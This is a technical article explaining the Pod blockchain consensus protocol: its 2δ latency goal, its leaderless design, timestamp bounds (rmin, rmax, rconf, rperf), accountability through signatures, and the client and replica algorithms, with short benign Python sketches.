&lt;p&gt;Traditional consensus protocols—such as Paxos, Raft, and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Byzantine_fault&quot;&gt;Byzantine Fault Tolerant&lt;&#x2F;a&gt; (BFT) algorithms—were originally designed for closed systems with a fixed number of nodes. These algorithms guarantee that if a message is accepted by one correct node, then it will eventually be accepted by all correct nodes (safety), and that new messages are eventually delivered (liveness). In the classical sense, consensus is achieved via multiple rounds of communication among nodes. This typically involves a leader or coordinator who proposes a value, and then the other nodes exchange messages to reach agreement.&lt;&#x2F;p&gt;
&lt;p&gt;However, these algorithms suffer from several limitations when applied to blockchain:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Communication Overhead:** Multiple rounds of message exchanges among all nodes lead to significant communication overhead. In a globally distributed network, this overhead translates into higher latency.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Leader-Based Bottlenecks:** Leader-based approaches centralize the ordering of transactions. While this can simplify the process of reaching consensus, it also creates vulnerabilities. A malicious or compromised leader can censor transactions, reorder them for personal gain (e.g., in the case of MEV), or cause delays.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Scalability:** Traditional consensus protocols are designed for small, known groups of nodes. Scaling these protocols to thousands of nodes (or more) in an open, permissionless network poses significant challenges in terms of both security and performance.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Latency:** Even in the best-case scenario, achieving consensus requires multiple network round trips. The lower bound for many protocols is expressed in terms of δ (the network delay). For instance, protocols based on Byzantine agreement have been shown to require at least t + 1 rounds (where t is the number of tolerated faults) in the synchronous setting, or at least 2n&#x2F;(n – t) rounds in the asynchronous case.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Because of these inherent limitations, blockchain systems that rely on traditional consensus (or their direct adaptations) often suffer from high transaction confirmation times, limiting their utility for applications that demand near-instant finality.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;consensus-in-blockchains&quot;&gt;Consensus in Blockchains&lt;&#x2F;h2&gt;
&lt;p&gt;Bitcoin introduced a revolutionary approach to consensus by using Proof-of-Work (PoW) to elect a leader probabilistically. In Bitcoin’s protocol, nodes (miners) compete to solve a cryptographic puzzle, and the first to solve it earns the right to propose the next block. While this approach has the advantage of being robust in an open, trustless environment, it also introduces significant inefficiencies:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **High Latency:** The block interval in Bitcoin is deliberately long (approximately 10 minutes) to reduce the probability of forks, resulting in slow confirmation times.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Energy Consumption:** PoW requires vast amounts of computational power and energy.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Finality Uncertainty:** Because Bitcoin’s chain can fork, finality is probabilistic. A transaction is typically considered “final” only after several blocks have been added to the chain (e.g., six confirmations).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Subsequent blockchain designs, such as Ethereum’s Proof-of-Stake (PoS) and various Byzantine Fault Tolerant (BFT) protocols, have attempted to reduce latency and improve throughput. Yet, many of these systems still rely on multi-round communication or leader-based architectures that inherently limit performance.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;the-quest-for-low-latency-consensus&quot;&gt;The Quest for Low-Latency Consensus&lt;&#x2F;h2&gt;
&lt;p&gt;The fundamental challenge for any blockchain consensus mechanism is the trade-off between the number of communication rounds (which directly impacts latency) and the security guarantees provided. The ideal scenario would be to achieve the “physically optimal” latency: a one-round-trip delay for writing a transaction and a one-round-trip delay for reading it—totaling 2δ, where δ is the actual network delay. This is the physical limit, as the information must travel from the writer to the replicas and then from the replicas to the reader.&lt;&#x2F;p&gt;
&lt;p&gt;Achieving such low latency, however, is not trivial. Eliminating inter-replica communication (which normally is required to guarantee total ordering and agreement) means that the system must forgo some of the stronger guarantees provided by classical consensus protocols. Instead, Pod aims for a “generalized consensus” that focuses on obtaining useful, application-specific information with minimal delay.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;beyond-total-order-broadcast-a-new-paradigm&quot;&gt;Beyond Total-Order Broadcast: A New Paradigm&lt;&#x2F;h2&gt;
&lt;p&gt;Most traditional blockchain consensus protocols focus on the total-order broadcast model. This means that every transaction is ordered sequentially, and all nodes agree on this order. While this is essential for certain applications, it is often overkill for other applications.&lt;&#x2F;p&gt;
&lt;p&gt;For instance, consider payment systems, decentralized auctions, or even certain types of decentralized data stores. In these cases, the requirement is not necessarily that every transaction be totally ordered, but rather that each transaction is confirmed quickly and that some weaker ordering properties hold. This is the insight behind Pod, which we discuss in the next section.&lt;&#x2F;p&gt;
&lt;p&gt;We can see that double-spending can be solved without total ordering, as &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;pod.network&#x2F;blog&#x2F;wait-why-do-we-need-consensus-again&quot;&gt;explained here&lt;&#x2F;a&gt;: imagine I want to send two conflicting transactions to two different parties, Alice and Bob. Suppose the number of validators is 3f + 1, where f is the number of Byzantine validators. I could bribe the f Byzantine validators to accept both transactions, then send Alice’s transaction to f other validators and Bob’s to a different set of f validators. If 2f + 1 validators have to agree, there is no way I can gather acceptance for both transactions: either neither goes through, or just one gets accepted and the other cannot receive enough support from honest parties.&lt;&#x2F;p&gt;
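&lt;p&gt;The quorum arithmetic behind this argument can be checked mechanically. The following sketch (ours, not from the paper) verifies that with n = 3f + 1 validators and quorums of size 2f + 1, any two quorums overlap in at least f + 1 validators, so at least one honest validator would have to endorse both conflicting transactions:&lt;&#x2F;p&gt;

```python
# Quorum-intersection arithmetic behind the no-double-spend argument:
# with n = 3f + 1 validators and quorums of size 2f + 1, any two quorums
# overlap in at least f + 1 validators, so the overlap must contain at
# least one honest validator.
def min_quorum_overlap(n: int, quorum: int) -> int:
    # Two sets of size `quorum` drawn from `n` validators share at least
    # 2 * quorum - n members (inclusion-exclusion).
    return max(0, 2 * quorum - n)

for f in range(1, 100):
    n = 3 * f + 1
    quorum = 2 * f + 1
    overlap = min_quorum_overlap(n, quorum)
    # The overlap always exceeds the number of Byzantine validators f,
    # so at least one honest validator sits in both quorums.
    assert overlap == f + 1 and overlap > f
```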
&lt;p&gt;The following picture, taken from &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;pod.network&#x2F;how-it-works&quot;&gt;this post&lt;&#x2F;a&gt; shows the difference between total ordering and Pod:&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;BJ9kfMYYyx.png&quot; alt=&quot;pod&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;We can see that in some logs, transaction 4 could happen before transaction 3, but all lie within a prescribed range.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;overview-of-pod-s-design&quot;&gt;Overview of Pod’s Design&lt;&#x2F;h2&gt;
&lt;p&gt;At its core, Pod is designed to achieve transaction confirmation within 2δ latency—the physical lower bound dictated by network delays. To do this, the protocol makes a fundamental design decision: it eliminates inter-replica communication during the transaction write phase. Instead, the following process is used:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. **Client-to-Replica Communication:** When a client submits a transaction, it sends the transaction directly to all replicas in the network. Each replica processes the transaction independently and appends it to its local log.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. **Timestamping and Sequencing:** To allow clients (readers) to derive meaningful information from the separate logs maintained by each replica, the replicas attach timestamps and sequence numbers to each transaction. The timestamps have millisecond precision and are non-decreasing. These values help clients determine when a transaction can be considered “confirmed.”&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. **Client-Side Log Aggregation:** When a client wishes to read the ledger, it collects the logs from enough replicas (typically 2&#x2F;3), validates the votes (which include digital signatures), and computes values such as **rmin** , **rmax** , and **rconf** (the minimum round, maximum round, and confirmed round, respectively). From these, the client can determine a past-perfect round—denoted **rperf** , such that the reader has received all transactions that are or will be confirmed prior to this round.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
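&lt;p&gt;As a rough illustration of the read path, here is a simplified sketch (ours; the full procedure is Algorithm 3 in the paper) of how a client might aggregate validated vote timestamps for one transaction into rmin, rconf, and rmax, taking rconf as the median. The real algorithm also accounts for replicas whose votes have not yet arrived:&lt;&#x2F;p&gt;

```python
# Simplified client-side vote aggregation for a single transaction:
# rmin and rmax bound the confirmed round, rconf is the median timestamp.
# Assumes a complete set of signature-validated votes (the paper's
# Algorithm 3 also handles replicas that have not voted yet).
def aggregate_votes(timestamps):
    ts = sorted(timestamps)
    rmin = ts[0]              # earliest replica timestamp
    rmax = ts[-1]             # latest replica timestamp
    rconf = ts[len(ts) // 2]  # median taken as the confirmed round
    return rmin, rconf, rmax

# Five replicas voted with slightly different millisecond timestamps:
rmin, rconf, rmax = aggregate_votes([103, 101, 105, 102, 104])
assert (rmin, rconf, rmax) == (101, 103, 105)
```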
&lt;p&gt;This design, while sacrificing the strong guarantees of total-order broadcast, enables the protocol to deliver transactions with a minimal delay of 2δ. The trade-off is that the ordering of transactions is “generalized” rather than strict; that is, the protocol guarantees that transactions will be confirmed within a specific time frame, and that their associated timestamps will lie within certain bounds.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;key-properties-and-guarantees&quot;&gt;Key Properties and Guarantees&lt;&#x2F;h2&gt;
&lt;p&gt;Pod is engineered to deliver several critical guarantees, making it particularly well-suited for applications where low latency is essential. These properties include:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Transaction Confirmation within 2δ:** Every transaction written by an honest client is guaranteed to be confirmed—i.e., appear in the output of any reader—with a delay of at most 2δ.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Censorship Resistance:** Even in the presence of Byzantine replicas (nodes that deviate arbitrarily), the protocol ensures that confirmed transactions are visible to every honest reader. This is crucial in applications such as payments and auctions, where censorship or selective inclusion could have severe consequences.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Past-Perfection Property:** Pod defines a “past-perfect round” (**rperf**), which guarantees that a client sees all possible transactions with rconf ≤ rperf. More precisely, suppose client A computes rperf and, at any point in the future, client B sees a transaction confirmed with rconf ≤ rperf; then client A was already aware of that transaction at the moment it computed rperf (though it may not have seen it as confirmed at that time). In the case of auctions, past-perfection ensures that no additional bids can be included after the auctioneer sees the deadline as past-perfect.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Accountability for Safety Violations:** The protocol includes mechanisms that allow for the identification of misbehaving replicas. If a safety violation occurs, the protocol can pinpoint which nodes deviated from the prescribed behavior. This accountability is enforced by the digital signatures attached to each transaction vote. Having accountability means that malicious actors can be slashed.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Flexible Transaction Timestamps:** Although different replicas may assign slightly different timestamp values to the same transaction, the protocol guarantees that the rconf for any honest client will be bounded between rmin and rmax (this is the confirmation bounds property).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The past-perfection and confirmation bounds ensure that parties cannot be blindsided by transactions suddenly appearing as confirmed too far in the past, and that the different transaction timestamps stay in a certain range.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;how-pod-differs-from-traditional-consensus&quot;&gt;How Pod Differs from Traditional Consensus&lt;&#x2F;h2&gt;
&lt;p&gt;Traditional consensus protocols, such as those used in longest-chain blockchains or BFT systems, rely on extensive communication among nodes to establish a total order of transactions. In contrast, Pod’s approach is to sidestep inter-replica communication altogether during the transaction write phase. This decision is pivotal for achieving optimal latency, but it also means that the protocol must accept a weaker form of ordering.&lt;&#x2F;p&gt;
&lt;p&gt;To illustrate this, consider the following contrasts:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Leader Election vs. Leaderless Operation:** In many blockchain systems, a leader (or sequencer) is elected to propose the next block. This leader is responsible for ordering transactions and ensuring that all nodes see the same sequence. In Pod, there is no such leader. Instead, every replica processes transactions independently and the ordering is derived by the client at read time.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Total-Order vs. Generalized Order:** Total-order broadcast protocols ensure that every node sees every transaction in the same order. Pod, on the other hand, guarantees that transactions are confirmed within a certain latency and that the order is “good enough” for applications like payments and auctions, where strict ordering is less critical.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Inter-Replica Communication Overhead:** By eliminating the need for replicas to communicate with each other, Pod dramatically reduces the communication overhead that typically limits the performance of consensus protocols. This design choice is the key to achieving 2δ latency, the best possible time-to-finality dictated by physical network delays.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;pod-core-the-technical-construction&quot;&gt;Pod-Core: The Technical Construction&lt;&#x2F;h2&gt;
&lt;p&gt;The technical core of the Pod protocol (referred to as pod-core in the paper) is built around the following mechanisms:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Client State and Voting:** Clients maintain state that includes the most recent transaction round (mrt), sequence numbers, and a mapping of transactions to votes received from replicas. When a client submits a transaction, it waits to receive “votes” from each replica. These votes include a timestamp (ts) and a sequence number (sn) along with a digital signature.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Vote Validation and Ordering:** On receiving a vote, the client first verifies the signature to ensure authenticity. It then checks that the sequence number is as expected. If the vote passes these checks, it is incorporated into the client’s local state. Clients use the collection of votes to compute rmin (the minimum timestamp), rmax (the maximum timestamp), and, via a median or other aggregation method, the confirmed round (rconf). This is the timestamp at which a given client takes the transaction as confirmed, and it may vary slightly from client to client. The confirmation bounds property ensures, however, that every honest client’s rconf will be bounded between rmin and rmax.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Replica Logs and Read Operations:** Replicas maintain their own logs of transactions. When a client performs a read operation, it collects these logs, validates them, and then computes a global view of the ledger that satisfies the past-perfection property. This view is then presented as the output of the read() operation.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;By adhering to these procedures, pod-core guarantees that any transaction written by an honest client will be confirmed with minimal latency and that any attempt by Byzantine nodes to censor or reorder transactions will be detectable and, thus, accountable.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;the-elimination-of-inter-replica-communication&quot;&gt;The Elimination of Inter-Replica Communication&lt;&#x2F;h2&gt;
&lt;p&gt;A central innovation in Pod is the removal of inter-replica communication during the write phase. Traditional consensus protocols require replicas to engage in multiple rounds of message exchanges to agree on the order of transactions. Pod circumvents this by allowing clients to broadcast their transactions directly to every replica. This design choice has several profound implications:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Optimal Latency:** Without waiting for replicas to coordinate with each other, the transaction’s propagation time is limited only by the physical delay of messages traveling through the network. Hence, the confirmation time is approximately 2δ.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Reduced Complexity:** By offloading the ordering responsibility to the client’s read operation, the protocol simplifies the interaction among replicas. Each replica independently timestamps and sequences transactions without needing to reconcile its state with others.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Localized Fault Isolation:** If a subset of replicas behaves maliciously, their misbehavior can be isolated and identified through the accountability mechanisms. The impact of Byzantine nodes is contained, and honest clients can still obtain a consistent view of the ledger by aggregating data from a sufficient number of honest replicas.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The protocol employs a streaming construction. Clients establish persistent connections with all replicas, enabling them to continuously receive “vote” messages as soon as a replica processes a transaction. This streaming nature means that rather than making isolated, one-off requests for each transaction, the client maintains an ongoing session where transaction updates—including timestamps, sequence numbers, and digital signatures—are streamed in real time. By persistently receiving this data, the client is able to immediately update its state and aggregate the votes necessary for computing parameters such as rmin, rmax, rconf, and rperf. This approach not only minimizes the overhead associated with repeatedly setting up new connections but also ensures that the client’s view of the ledger remains as current as possible, thereby contributing to the protocol’s objective of near-optimal latency. This departs from the block-based pattern, in which a client must wait for its transaction to appear in a block before it is confirmed, adding delay.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;timestamping-and-the-computation-of-rmin-rmax-and-rconf&quot;&gt;Timestamping and the Computation of rmin, rmax, and rconf&lt;&#x2F;h2&gt;
&lt;p&gt;Pod introduces a sophisticated scheme for assigning and aggregating timestamps to ensure that, even in the absence of inter-replica communication, clients can derive a coherent view of transaction ordering. The key components are:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **rmin (Minimum Round):** The lower bound on the transaction&amp;#39;s rconf for an honest client. Calculation given in [lines 1-13 of algorithm 3](https:&#x2F;&#x2F;arxiv.org&#x2F;pdf&#x2F;2501.14931).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **rmax (Maximum Round):** The upper bound on the transaction&amp;#39;s rconf for an honest client. Calculation given in [lines 14-26 of algorithm 3](https:&#x2F;&#x2F;arxiv.org&#x2F;pdf&#x2F;2501.14931).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **rconf (Confirmed Round):** A computed value—derived as the median of the timestamps received from a quorum of replicas—that signifies when a transaction becomes confirmed. Calculation given in [lines 12-18 of algorithm 2](https:&#x2F;&#x2F;arxiv.org&#x2F;pdf&#x2F;2501.14931).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The protocol guarantees that, for any transaction, the confirmed round rconf will satisfy the bounds determined by rmin and rmax.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;arxiv.org&#x2F;pdf&#x2F;2501.14931&quot;&gt;Lemma 1&lt;&#x2F;a&gt; shows that the values of rmin and rmax will correspond to the sorted values (in increasing order) at positions $\lfloor \alpha &#x2F; 2 \rfloor - \beta$ and $n - \alpha + \lfloor \alpha &#x2F; 2 \rfloor + \beta$, respectively. Here $\alpha$ is the confirmation threshold and $\beta$ the resilience threshold, satisfying $n - \alpha = \beta$. If $\alpha \geq 4\beta + 1$, Lemma 2 indicates that there is at least one honest replica such that its most recent timestamp is, at most, rperf. Lemmas 3 and 4 guarantee, under the same assumptions, that we have confirmation within $2\delta$ and past-perfection within $\delta$. Lemmas 5, 6 and 7 guarantee that the construction has past-perfection safety, confirmation bounds and $\beta$-accountable safety, respectively. All these results are combined to prove the security of Pod-core as stated in Theorem 1.&lt;&#x2F;p&gt;
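&lt;p&gt;A minimal sketch of these computations, assuming zero-based indexing into the sorted timestamps (the convention in the paper may differ by one, and the function names are ours):&lt;&#x2F;p&gt;

```python
import statistics

def timestamp_bounds(timestamps, n, alpha, beta):
    # Lemma 1: rmin and rmax are the sorted timestamps at positions
    # floor(alpha/2) - beta and n - alpha + floor(alpha/2) + beta.
    ts = sorted(timestamps)
    rmin = ts[alpha // 2 - beta]
    rmax = ts[n - alpha + alpha // 2 + beta]
    return rmin, rmax

def confirmed_round(quorum_timestamps):
    # rconf is the median of the timestamps received from a quorum
    return statistics.median(quorum_timestamps)
```

&lt;p&gt;For example, with n = 5, alpha = 4 and beta = 1, rmin is the second-smallest and rmax the largest of the received timestamps.&lt;&#x2F;p&gt;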
&lt;h2 id=&quot;digital-signatures-and-accountability&quot;&gt;Digital Signatures and Accountability&lt;&#x2F;h2&gt;
&lt;p&gt;Every transaction vote in Pod is accompanied by a digital signature. This has multiple advantages:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Authentication:** Clients can verify that the vote indeed comes from the claimed replica, preventing impersonation attacks.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Non-Repudiation:** Since signatures are cryptographically secure, a malicious replica cannot later deny that it sent a particular vote.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Misbehavior Detection:** If a replica sends inconsistent or out-of-order votes, these discrepancies can be detected by comparing signatures across different replicas’ logs. The identify() function in the protocol uses these digital proofs to pinpoint the source of any violation of safety properties.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;This accountability mechanism is essential not only for security but also for enforcing economic incentives. If a replica is caught misbehaving, it can be penalized (for example, through slashing of its stake), which in turn discourages behavior that could undermine the protocol’s guarantees.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;algorithms&quot;&gt;Algorithms&lt;&#x2F;h2&gt;
&lt;h3 id=&quot;client-algorithms-1-2-and-3&quot;&gt;Client (Algorithms 1, 2 and 3)&lt;&#x2F;h3&gt;
&lt;p&gt;The client maintains a state consisting of all the replicas and their public keys, the most recent timestamp and next expected sequence number for each replica, the timestamps received for each transaction from each replica, and the pod observed by the client so far.&lt;&#x2F;p&gt;
&lt;p&gt;After initialization (steps 7-14 of algorithm 1), the client can submit a transaction for inclusion. To that end, the client sends it to all the replicas (steps 1-5 of algorithm 2). Upon reception, honest replicas answer back with their vote. Every time the client receives a vote, the client (steps 15-24, algorithm 1):&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. will verify the signature (step 16, returning if invalid).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. checks whether the sequence number matches the expected one (step 17, returning if the vote cannot be processed).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. updates the corresponding next sequence number (step 18).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. ensures that the timestamp is not less than the mrt (step 19, returning if it is an older timestamp).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    5. updates the mrt (step 20) and checks whether the transaction is a heartbeat (step 21, doing nothing else for a heartbeat).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    6. checks for duplicate timestamps (step 22, returning if there is a duplicate).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    7. adds the timestamp for the transaction in the log corresponding to the replica (step 23).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
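&lt;p&gt;The vote-handling steps above can be condensed into a sketch (the state layout, field names, and the verify_sig callback are stand-ins of ours, not the actual interfaces of pod):&lt;&#x2F;p&gt;

```python
# Condensed sketch of the client vote handler (algorithm 1, steps 15-24).
def on_vote(state, vote, verify_sig):
    r = vote["replica"]
    if not verify_sig(r, vote):                         # step 16: bad signature
        return
    if vote["sn"] != state["next_sn"][r]:               # step 17: unexpected sequence number
        return
    state["next_sn"][r] = vote["sn"] + 1                # step 18
    if state["mrt"][r] > vote["ts"]:                    # step 19: stale timestamp
        return
    state["mrt"][r] = vote["ts"]                        # step 20
    if vote["tx"] == "HEARTBEAT":                       # step 21: nothing else to do
        return
    if r in state["tslog"].setdefault(vote["tx"], {}):  # step 22: duplicate timestamp
        return
    state["tslog"][vote["tx"]][r] = vote["ts"]          # step 23: record the timestamp
```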
&lt;p&gt;The client can afterwards perform a read operation, following the steps 6 to 28 in algorithm 2:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Initializes transaction and additional information (step 7)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Loops over all transactions in the pod (steps 8 - 21),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Computes rmin and rmax (steps 9 and 10) and sets rconf to bottom, as well as setting the timestamps and additional information to empty (step 11).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * If there is a quorum (checking that there are at least $\alpha$ valid signatures), the client gets the timestamps (step 14), appends them to the timestamp list (step 15), appends the vote to the additional information (step 16), computes the rconf for the transaction as the median (step 18), and appends the transaction to the transaction log (step 20).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. Computes the rperf (step 22).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. Appends the message votes for mrt for each replica (step 24).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    5. Assembles the pod from the information (transactions, rperf and additional information) and returns the pod (steps 26-27).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
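&lt;p&gt;A compact sketch of this read path; here rperf is simplified to the minimum of the most recent timestamps, whereas algorithm 3 derives it from estimated next timestamps (helper names are ours):&lt;&#x2F;p&gt;

```python
import statistics

# Sketch of the read operation (algorithm 2, steps 6-28): confirm every
# transaction backed by a quorum of alpha votes, then derive rperf.
def read_pod(tslog, mrt, alpha):
    confirmed = {}
    for tx, votes in tslog.items():
        if len(votes) >= alpha:                                # quorum reached
            confirmed[tx] = statistics.median(votes.values())  # rconf (step 18)
    rperf = min(mrt.values())                                  # simplified past-perfect round (step 22)
    return {"transactions": confirmed, "rperf": rperf}
```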
&lt;p&gt;Algorithm 3 computes the minimum (lines 1-13), maximum (lines 14-26), and minimum estimated next timestamps (lines 27-32), as well as the median (lines 33-35).&lt;&#x2F;p&gt;
&lt;h3 id=&quot;replica-algorithm-4&quot;&gt;Replica (Algorithm 4)&lt;&#x2F;h3&gt;
&lt;p&gt;The replica keeps a list of all connected clients, the next sequence number, and its log, and has a function returning the clock time of the replica (lines 1-4). The replica initializes with a clean log and no connections (5-7). At the end of each round, the replica sends a heartbeat to each connection (26-28).&lt;&#x2F;p&gt;
